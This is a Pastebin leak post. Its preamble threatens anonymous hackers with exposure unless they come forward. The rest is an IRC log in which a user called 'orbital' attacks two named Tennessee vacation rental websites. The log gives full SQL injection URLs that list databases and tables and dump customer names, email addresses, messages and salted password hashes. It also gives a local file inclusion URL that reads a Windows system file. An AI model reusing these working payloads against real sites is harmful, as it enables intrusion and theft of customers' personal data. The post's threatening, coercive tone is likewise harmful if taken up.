Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ______ ___ __ ________ _______ ___ __ __ ________
- /ZP___/\ /__/\ /__/\ /_______/\/______/\ /__//_//_/\ /_______/\
- \::AC_\/_\::\_\\ \ \ \__.::._\/\::::__\/__\::\| \| \ \\::: _ \ \
- \:\/___/\\:.R`-\ \ \ \::\ \ \:\ /____/\\:. KK \ \\::(_) \ \
- \TJ___\/_\:. _ HF\ \ _\::\ \__\:\\_DM_\/ \:.\-/\ \ \\:: __ \ \
- \:\____/\\. \`-\ \ \/__\JD\__/\\:\_\ \ \ \. \ \CN\ \\:.\ \RR\ \
- \MM_DF\/ \__\/ \__\/\_BB_AA___\/ \_GT_\/ \__\/ \__\/ \__\/\__\/
- ADD ME ON TWITTER: @ZippieIRC
- We would like present you with another leak, This time we have incriminating evidence of orbital hacking Majestic Mountain Vacations in Tennessee.
- We currently have over 200 logs of anonymous hackers like this one. we will post them one at a time identifying a name to each hack. If your company has been hacked, this information can be used in court to prosecute your attackers.
- Hackers: The only way to prevent a release with your name is to come forward to me ASAP. you can email me at davidhtn @ gmail . com
- Don't go down like a bitch. We can protect your identity and no one will know you came forward, but only if you are honest with us. if you lie, we pour your dirty laundry out the window. we are tired of the games.
- <>
- Orbital Log 28
- <>
- Aug 16 20:53:34 <orbital> lool
- Aug 16 20:53:56 <orbital> but i must say
- Aug 16 20:54:06 <orbital> using shitty old sql servers made their website a lot more secure
- Aug 16 20:54:29 <orbital> it doesnt even support union it seems
- Aug 16 20:54:46 <orbital> it says syntax error
- Aug 16 20:54:47 <orbital> :3
- Aug 16 20:55:51 <orbital> lul
- Aug 16 20:58:07 <orbital> hm weird
- Aug 16 20:58:13 <orbital> just union works
- Aug 16 21:02:54 <orbital> get them from the database! :D
- Aug 16 21:03:02 <orbital> http://www.majesticmountainvacations.com/search_results.asp?search_type=2&amenity=43&amenity=36%29%20union%20select%20null,%27Insert%20Shit%20here%27,null,null,null,null,null,null,null,null,null%20--
- Aug 16 21:09:42 <orbital> http://www.majesticmountainvacations.com/search_results.asp?search_type=2&amenity=43&amenity=36%29%20union%20select%201,name,%273%27,4,5,%276%27,7,8,9,10,null%20from%20master..sysdatabases%20--
- Aug 16 21:09:43 <orbital> derp
- Aug 16 21:13:43 <orbital> lul
- Aug 16 21:18:34 <orbital> http://www.majesticmountainvacations.com/search_results.asp?search_type=2&amenity=-1&amenity=36%29%20union%20select%201,name,%273%27,4,5,%276%27,7,8,9,10,null%20from%20cabin..sysobjects%20where%20xtype%20=%20%27U%27--
- Aug 16 21:18:34 <orbital> mkay
- Aug 16 21:22:10 <orbital> those are tables
- Aug 16 21:22:10 <orbital> in lotsa databases
- Aug 16 21:22:11 <orbital> oO
- Aug 16 21:36:07 <orbital> http://www.majesticmountainvacations.com/search_results.asp?search_type=2&amenity=-1&amenity=36%29%20union%20select%201,name,email_addr,4,5,%276%27,7,8,9,10,null%20from%20cc_email%20where%20msg_pm_id%20%3C%201000%20--
- Aug 16 21:36:10 <orbital> emails and names
- Aug 16 21:36:33 <orbital> only 1000 tho
- Aug 16 21:36:47 <orbital> dunno how long the whole database is
- Aug 16 21:37:19 <orbital> just did that for speed :P
- Aug 16 21:37:35 <orbital> well
- Aug 16 21:37:37 <orbital> still
- Aug 16 21:37:43 <orbital> you cant request all the info
- Aug 16 21:37:47 <orbital> crashes the script
- Aug 16 21:37:48 <orbital> :)
- Aug 16 21:39:35 <orbital> its np to grab it all
- Aug 16 21:39:43 <orbital> i tried with 10000 and it works
- Aug 16 21:39:49 <orbital> 10000 chunks is not small
- Aug 16 21:39:53 <orbital> :p
- Aug 16 21:40:05 <orbital> i found a column named password tho
- Aug 16 21:40:08 <orbital> i'll investigate
- Aug 16 21:40:42 <orbital> xP
- Aug 16 21:54:14 <orbital> :p
- Aug 16 22:11:41 <orbital> http://www.majesticmountainvacations.com/search_results.asp?search_type=2&amenity=-1&amenity=36%29%20union%20select%201,login,salt%2B%27/%27%2Bpswd,4,5,%276%27,7,8,9,10,null%20from%20entity_pswd--
- Aug 16 22:13:55 <orbital> passwords are salted and hashed tho :/
- Aug 16 22:18:31 <orbital> http://www.majesticmountainvacations.com/search_results.asp?search_type=2&amenity=-1&amenity=36%29%20union%20select%201,name%2B%27%20-%20%27%2Bemail_addr,convert%28varchar%28max%29,msg%29,4,5,%276%27,record_id,8,9,10,null%20from%20cc_email%20where%20record_id%20%3C%201000%20--
- Aug 16 22:18:31 <orbital> sweet
- Aug 16 22:23:15 <orbital> ^^
- Aug 16 23:22:28 * orbital has quit (Quit: http://www.mibbit.com ajax IRC Client)
- Aug 17 07:46:28 * Disconnected (Connection reset by peer).
- Aug 17 08:25:55 <orbital> :DP
- Aug 17 08:31:58 <orbital> ^^
- Aug 17 08:34:07 <orbital> damn they filter backslashes out completely
- Aug 17 08:34:12 <orbital> they have local file inclusion all over the place :&
- Aug 17 08:34:20 <orbital> but you cant go back in the directory... fuuu
- Aug 17 08:34:20 <orbital> :D
- Aug 17 08:34:36 <orbital> well actually
- Aug 17 08:34:46 <orbital> the windows kernel supports both front and backslash for paths lemme test
- Aug 17 08:36:23 <orbital> seems tow ork
- Aug 17 08:38:02 <orbital> ye
- Aug 17 08:38:10 <orbital> sometimes you gotta love windows :D
- Aug 17 08:40:47 <orbital> http://vacationvalleyreservations.com/Reservations/TCSRWeb.dll/PropertyInfo?PropName=God%27s%20Little%20Corner&Header=../../Windows/system.ini&Footer=Footer.htm&TravelAgent=
- Aug 17 08:40:49 <orbital> yup works
- Aug 17 08:40:49 <orbital> :P
- Aug 17 08:44:34 <orbital> well
- Aug 17 08:44:40 <orbital> they use asp or sth
- Aug 17 08:44:47 <orbital> dunno much aout it
- Aug 17 08:44:51 <orbital> i know that with php on windows lfi = remote code execution
- Aug 17 08:44:52 <orbital> :P
- Aug 17 08:55:32 <orbital> hm jesus i never had this kind of combo for lfi
- Aug 17 08:55:33 <orbital> asp+iis
- Aug 17 08:55:34 <orbital> urgh
- Aug 17 08:56:34 <orbital> PHP&(IIS|Apache) would've been better :/
- Aug 17 09:02:30 <orbital> haha
- Aug 17 09:02:35 <orbital> yea but php + iis is soooo much fun
- Aug 17 09:02:46 <orbital> because you can execute arbitrary code :/
- Aug 17 09:02:55 <orbital> its quite cool
- Aug 17 09:02:55 <orbital> :D
- Aug 17 09:03:24 <orbital> and and linux i do atleast know where the logs n everything are
- Aug 17 09:03:30 <orbital> and the passwords
- Aug 17 09:04:08 <orbital> maybe they're not even using asp but this weird dll does the job i guess
- Aug 17 09:04:14 <orbital> dunno who came up with that but what ever lol
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement